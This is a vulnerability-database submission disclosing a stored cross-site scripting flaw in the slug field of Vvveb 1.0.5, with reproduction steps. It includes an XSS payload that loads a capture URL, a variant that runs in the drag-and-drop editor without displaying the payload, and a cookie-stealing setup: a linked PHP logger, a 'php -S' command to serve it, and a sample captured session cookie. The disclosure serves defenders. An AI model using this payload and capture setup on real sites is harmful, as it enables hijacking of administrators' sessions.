| タイトル | Vvveb 1.0.5 Cross Site Scripting |
|---|
| 説明 | Description
The endpoint at [/vadmin123/index.php?module=content/post&type=post] and [/vadmin123/index.php?module=content/posts&type=page] is vulnerable to XSS, an attacker can trigger XSS by injecting malicious code into slug parameter.
The payload can be triggered by editing the post/page or by using drag and drop designer.
Both endpoints are accessible by an editor and can be used to inject malicious XSS to steal cookies of other site admins, editors or even super admins.
Reproduce
To reproduce the issue, navigate to any of these endpoints to view posts or pages:
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page
Edit a post or a page (both are very similar):
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page
Insert the following payload in slug and save the page:
"><img src='http://127.0.0.1:1718/capture.php'>
Once the page reloads, the code will be executed. Additionally, this can be triggered if other moderators/admins were to click on the post, clicking the post/page directly opens it in edit mode:
http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
It can also be triggered if you open the post using drag and drop editor:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend&url=//127.0.0.1/%22%3E%3Cimg%20src=%27http://127.0.0.1:1718/capture.php%27%3E&template=content/post.html
Additionally, it can be triggered if you just open endpoint in drag and drop editor just by its name:
http://127.0.0.1/vadmin123/?module=editor/editor&name=Mauris+viverra+cursus+ante+laoreet+eleifend
This is useful because it doesn't show the payload but executes it anyway.
Cookie stealing
To steal cookies, I created the following php script:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Save this into a capture.php file and then start php start with the following command:
> php -S x.x.x.x:1718
This saves cookies to a file named cookie_log.txt, cookies are saved with a timstamp:
[2025-01-03 18:09:17] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; PHPSESSID=EzuO8BB8K7BLfydEIx%2C1De1mJA3ONYvZBOIhjeXt-syZFn0%2C; user=1
Cookies can later be used to access admin or another site moderator's account. |
|---|
| ソース | ⚠️ https://hkohi.ca/vulnerability/6 |
|---|
| ユーザー | 0xHamy (UID 88518) |
|---|
| 送信 | 2025年08月04日 18:42 (11 月 ago) |
|---|
| モデレーション | 2025年08月13日 18:34 (9 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 319971 [givanz Vvveb 迄 1.0.5 edit.tpl slug クロスサイトスクリプティング] |
|---|
| ポイント | 19 |
|---|